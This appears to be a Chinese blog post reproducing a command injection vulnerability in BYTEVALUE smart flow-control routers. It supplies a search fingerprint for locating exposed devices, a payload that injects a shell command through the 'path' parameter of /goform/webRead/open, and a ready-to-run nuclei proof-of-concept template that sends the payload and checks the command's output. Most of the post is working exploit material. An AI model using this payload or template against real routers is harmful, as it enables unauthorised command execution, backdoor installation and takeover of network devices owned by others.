【漏洞复现】BYTEVALUE智能流控路由器存在命令执行

【漏洞介绍】

百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。

【指纹】

title="BYTEVALUE 智能流控路由器"

【UI】

【payload】

/goform/webRead/open/?path=|whoami

【Poc】

id: BYTEVALUE-Rce
info:
  name: BYTEVALUE-Rce
  author: BYTEVALUE-Rce
  severity: critical
  tags: BYTEVALUE

http:
  - raw:
    - |
        GET /goform/webRead/open/?path=|whoami HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "admin"
      - type: status
        status:
          - 200

【使用nuclei复现】

相关推荐
学习溢出1 小时前
深入了解 net user 命令:上一次是谁登录的?
windows·网络安全·系统安全
不灭锦鲤2 小时前
ssrf学习(ctfhub靶场)
网络·学习·安全
鲨鱼辣椒丶D2 小时前
「漏洞复现」用友U8 CRM config/fillbacksettingedit.php SQL注入漏洞
web安全
网络研究院5 小时前
如何安全地大规模部署 GenAI 应用程序
网络·人工智能·安全·ai·部署·观点
DonciSacer8 小时前
TryHackMe 第6天 | Web Fundamentals (一)
安全
云卓科技12 小时前
无人机之数据提取篇
科技·安全·机器人·无人机·制造
山兔112 小时前
工控安全防护机制与技术
安全
CyberMuse13 小时前
网络安全cybersecurity的几个新领域
网络安全
HEX9CF14 小时前
【CTF Web】Pikachu xss之href输出 Writeup(GET请求+反射型XSS+javascript:伪协议绕过)
开发语言·前端·javascript·安全·网络安全·ecmascript·xss
火红的小辣椒14 小时前
XSS基础
android·web安全